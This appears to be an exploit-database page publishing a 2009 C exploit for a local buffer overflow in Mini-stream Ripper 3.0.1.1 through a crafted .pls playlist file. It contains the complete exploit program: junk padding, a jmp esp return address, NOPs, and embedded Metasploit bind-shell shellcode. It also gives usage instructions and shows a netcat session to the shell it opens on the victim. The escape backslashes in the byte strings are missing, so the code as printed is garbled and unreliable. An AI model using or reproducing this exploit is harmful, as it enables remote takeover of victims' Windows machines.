Mini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit
# Published : 2009-12-27
# Author : mr_me
# Previous Title : Media Jukebox 8.0.400 (seh) Buffer Overflow Exploit (meta)
# Next Title : Mini-Stream Exploit for Windows XP SP2 and SP3
/*

riptheministreamripper.c

Mini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit 
exploited by: mr_me
Greetz to the Corelan Security Team: corelanc0d3r, rick, edi, dellnull, marko T, phifli, corelanc0d3r
Visit: corelanc0d3r's blog http://www.corelan.be:8800/
reference: http://www.exploit-db.com/exploits/10646 
Download: http://mini-stream.net/
Tested on: Windows XP sp3

Note: *** For educational purposes only ***

usage:
Compile and execute to create the .pls file and upload it to your favourite server. 
Then click on 'LOAD' and then 'URL'. Enter the evil URL, BAM you win.

mrme@backtrack:~$ nc -v 192.168.2.5 4444
192.168.2.5: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.2.5] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:Program FilesMini-streamMini-stream Ripper>

I hope everyone had a Merry Christmas! and soon to have a Happy New Year!

*/ 

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum 
   http://metasploit.com */

unsigned char shell[] = 
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e"
"x4fx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x56x4bx58"
"x4ex56x46x32x46x32x4bx38x45x44x4ex43x4bx58x4ex47"
"x45x50x4ax57x41x50x4fx4ex4bx38x4fx34x4ax41x4bx58"
"x4fx55x42x52x41x30x4bx4ex43x4ex42x53x49x54x4bx38"
"x46x53x4bx58x41x30x50x4ex41x33x42x4cx49x39x4ex4a"
"x46x58x42x4cx46x57x47x30x41x4cx4cx4cx4dx50x41x30"
"x44x4cx4bx4ex46x4fx4bx33x46x55x46x42x4ax42x45x57"
"x43x4ex4bx58x4fx55x46x52x41x50x4bx4ex48x36x4bx58"
"x4ex50x4bx34x4bx48x4fx55x4ex41x41x30x4bx4ex43x30"
"x4ex52x4bx48x49x38x4ex36x46x42x4ex41x41x56x43x4c"
"x41x43x42x4cx46x46x4bx48x42x54x42x33x4bx58x42x44"
"x4ex50x4bx38x42x47x4ex41x4dx4ax4bx48x42x54x4ax50"
"x50x35x4ax46x50x58x50x44x50x50x4ex4ex42x35x4fx4f"
"x48x4dx41x53x4bx4dx48x36x43x55x48x56x4ax36x43x33"
"x44x33x4ax56x47x47x43x47x44x33x4fx55x46x55x4fx4f"
"x42x4dx4ax56x4bx4cx4dx4ex4ex4fx4bx53x42x45x4fx4f"
"x48x4dx4fx35x49x48x45x4ex48x56x41x48x4dx4ex4ax50"
"x44x30x45x55x4cx46x44x50x4fx4fx42x4dx4ax36x49x4d"
"x49x50x45x4fx4dx4ax47x55x4fx4fx48x4dx43x45x43x45"
"x43x55x43x55x43x45x43x34x43x45x43x34x43x35x4fx4f"
"x42x4dx48x56x4ax56x41x41x4ex35x48x36x43x35x49x38"
"x41x4ex45x49x4ax46x46x4ax4cx51x42x57x47x4cx47x55"
"x4fx4fx48x4dx4cx36x42x31x41x45x45x35x4fx4fx42x4d"
"x4ax36x46x4ax4dx4ax50x42x49x4ex47x55x4fx4fx48x4d"
"x43x35x45x35x4fx4fx42x4dx4ax36x45x4ex49x44x48x38"
"x49x54x47x55x4fx4fx48x4dx42x55x46x35x46x45x45x35"
"x4fx4fx42x4dx43x49x4ax56x47x4ex49x37x48x4cx49x37"
"x47x45x4fx4fx48x4dx45x55x4fx4fx42x4dx48x36x4cx56"
"x46x46x48x36x4ax46x43x56x4dx56x49x38x45x4ex4cx56"
"x42x55x49x55x49x52x4ex4cx49x48x47x4ex4cx36x46x54"
"x49x58x44x4ex41x43x42x4cx43x4fx4cx4ax50x4fx44x54"
"x4dx32x50x4fx44x54x4ex52x43x49x4dx58x4cx47x4ax53"
"x4bx4ax4bx4ax4bx4ax4ax46x44x57x50x4fx43x4bx48x51"
"x4fx4fx45x57x46x54x4fx4fx48x4dx4bx45x47x35x44x35"
"x41x35x41x55x41x35x4cx46x41x50x41x35x41x45x45x35"
"x41x45x4fx4fx42x4dx4ax56x4dx4ax49x4dx45x30x50x4c"
"x43x35x4fx4fx48x4dx4cx56x4fx4fx4fx4fx47x33x4fx4f"
"x42x4dx4bx58x47x45x4ex4fx43x38x46x4cx46x36x4fx4f"
"x48x4dx44x55x4fx4fx42x4dx4ax36x4fx4ex50x4cx42x4e"
"x42x36x43x55x4fx4fx48x4dx4fx4fx42x4dx5a";

int main ( int argc , char * argv[])
{
    FILE* expfle= NULL;
    char* EIP = "x53x93x42x7e"; // jmp esp -> user32.dll
    int i;

    printf("t. .. ... Mini-stream Ripper (.pls) Stack buffer Overflow Exploit ... .. .rn");
    printf("t          -------> now upload the .pls file to a remote server <-------n");


    if( (expfle=fopen("mini-stream-ripper.pls","wb")) ==NULL )
    {
         perror("Cannot create the exploit file!!! :(");
         exit(0);
    }

                for (i=0; i<17405; i++)
                {
                    fwrite("x41", 1, 1, expfle); // Junk
                }

                fwrite(EIP, 4, 1, expfle); // ret

                for (i=0; i<10; i++)
                {
                    fwrite("x90", 1, 1, expfle); // Nop's
                }
		
		fwrite(shell, sizeof(shell), 1, expfle); // write the shell

		for (i=0; i<16702; i++)
                {
                    fwrite("xcc", 1, 1, expfle); // finish off buffer
                }

                fclose(expfle);

                printf("[+] mini-stream-ripper.pls Created successfully! rn");
                printf("[+] Exploited by mr_me rn");

    return 0;

}